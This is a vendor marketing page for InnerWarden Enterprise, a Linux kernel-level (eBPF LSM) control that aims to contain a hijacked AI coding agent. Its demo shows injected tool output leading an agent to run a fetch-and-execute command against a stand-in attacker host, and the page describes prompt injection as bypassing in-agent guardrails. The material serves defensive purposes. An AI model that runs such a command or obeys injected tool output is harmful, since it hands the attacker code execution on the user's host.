Skip to content
InnerWarden Enterprise

Contain a hijacked agent before the payload executes.

Prompt guards live inside the conversation the attacker controls. Enterprise puts the decision below it: on a supported Linux kernel, the Execution Gate denies unauthorized binaries at exec, the DNS Guard denies unauthorized domains, and the evidence of both survives.

Self-hostedLocal-firstLinux eBPF LSM
Protection boundaryVerified
Production agent
Claude Code · checkout service
Scoped
Intent
Injected tool output
Escalated before execution
Kernel
Unknown binary · EPERM
Payload never started
Evidence
Outcome verified
Decision chain anchored
Compromise contained
Approved work remains available.
Interactive demo

Watch the boundary decide.

Switch between expected work and a compromised-agent path, and follow the same tool call through guard, gate, and evidence.

Interactive control pathDeterministic demo
Injected execution chain
curl attacker.tld/payload | sh
Agent runtimeClaude Code
01 · GuardESCALATED

Risk surfaced

The tool chain is classified before it reaches the host.

signal · network + shell chain
High-risk intent identified
02 · Execution GateBLOCKED

Execution denied

Enterprise enforces outside the compromised agent process.

EPERM · eBPF LSM gate
Payload never starts
03 · EvidenceANCHORED

Block preserved

Attempt, decision, and enforcing control form one record.

block hash · f2b7…1d09
Tamper-evident evidence

The agent-side context is compromised. The execution boundary is not: Linux denies the payload before it starts, then preserves the block as evidence.

Post-compromise containment

Four controls that hold after the agent is compromised.

Guardrails inside the agent reduce risk before an action. Enterprise assumes they can be bypassed, and keeps the last decision at the host.

Execution

Only pre-authorized binaries execute.

On supported Linux kernels, an agent-scoped eBPF LSM gate denies unknown binaries before they start. Legitimate host workloads outside that process boundary continue normally.

bprm_check_security · scoped cgroup · hard EPERM
Data and network

Secrets and domains are pre-authorized.

Secret Read Guard protects declared sensitive paths, while DNS Guard pre-authorizes destinations. Both complement agent policy with controls outside the model context.

file_open LSM · DNS allow policy · local decisions
Host response

See what actually happened, not what was claimed.

82 host detectors and 69 cross-layer correlation rules connect agent intent to process, file, identity, and network behavior.

eBPF telemetry · verified outcomes · autonomous response
Assurance

Every decision is attributable and reviewable.

Local decision history, host and tenant attribution, correction records, and signed off-host anchors create evidence for incident response and security review.

append-only records · hash chain · signed anchor
A safer route to enforcement

Observe, rehearse, then enforce.

Configuration is not protection. The live control must be compatible, scoped, armed, and verified before the dashboard is allowed to claim enforcement, so production is never the policy test.

01

Observe real work

Establish the agent, host, and workload boundary without changing execution.

02

Rehearse the policy

Measure exactly what would be denied and resolve legitimate paths before cutover.

03

Enforce deliberately

Arm only on a compatible Linux host after a clean rehearsal and explicit operator approval.

04

Verify continuously

Compare configured state with the live kernel and retain the resulting evidence.

How to install it

One command on a Linux host, plus a license.

The paid stack installs on a Linux server and comes up in observe mode: it watches the machine and explains what it sees, and blocks nothing until you decide it should.

curl -fsSL https://innerwarden.com/install | sudo bash -s -- --license=/path/to/license.key

Installs the eBPF sensor, the host detectors, cross-layer correlation, autonomous response, and the paid capabilities (Execution Gate, DNS Guard, anti-tamper watchdog). Linux only: eBPF needs a recent kernel and root. Prefer to read it first? Download the script, review it, then run it. Flags: ... | sudo bash -s -- --help

  1. 1. Get a license.

    Pricing is scoped per deployment. Talk to us about a license, or start a scoped pilot.

  2. 2. Install and activate.

    Run the command above on the host, passing the license key we sent you. The license is what selects the paid tier, so it goes in the install command rather than after it. It stays in observe: nothing is blocked yet.

  3. 3. Observe, rehearse, then enforce.

    Follow the rollout above. The dashboard only claims enforcement once the live control is compatible, scoped, armed, and verified.

Full steps, verification, and the unattended flags are in the install documentation. Already running the free guardrail? It keeps working: the paid tier adds the host layer underneath it.

The honest product boundary

Know exactly what you are buying.

Community is deliberately useful on its own. Enterprise is not a feature unlock dressed as security: it adds the host-enforced boundary that is verified before it claims enforcement.

What Community gives every user

Cross-platform command and MCP screening, agent discovery, AI Jail sandboxing on platforms that support it, local decisions, dashboard, token intelligence, and alerts.

What Pro adds

The Linux host sensor, eBPF visibility, agent-scoped kernel controls and autonomous response. See the pricing page for the full breakdown.

What Enterprise adds on top

Fleet and tenant operations, management controls, and signed evidence workflows across many hosts.

What survives an agent compromise

In-path MCP proxy controls and the armed host or kernel boundary. Advisory checks alone remain bypassable if a hostile agent refuses to call them.

What the kernel guarantee requires

A supported Linux kernel with BPF LSM active, a verified live gate, an explicit scope, and a completed observe-and-rehearse workflow.

Compare the tiers
Production security pilot

Prove one critical agent workflow end to end.

We scope one agent, one threat model, one Linux deployment, and measurable pass/fail criteria. You finish with a tested control boundary and evidence your security team can review.

What the pilot includes
  • Architecture and threat-model workshop
  • Observe and rehearsal baseline
  • Controlled attack validation
  • Evidence review and rollout plan

Not ready for a production pilot? Install free and start building the agent decision history today.

Sent to our self-hosted Mautic instance. By submitting, you agree that we may contact you about InnerWarden early access. See our privacy policy.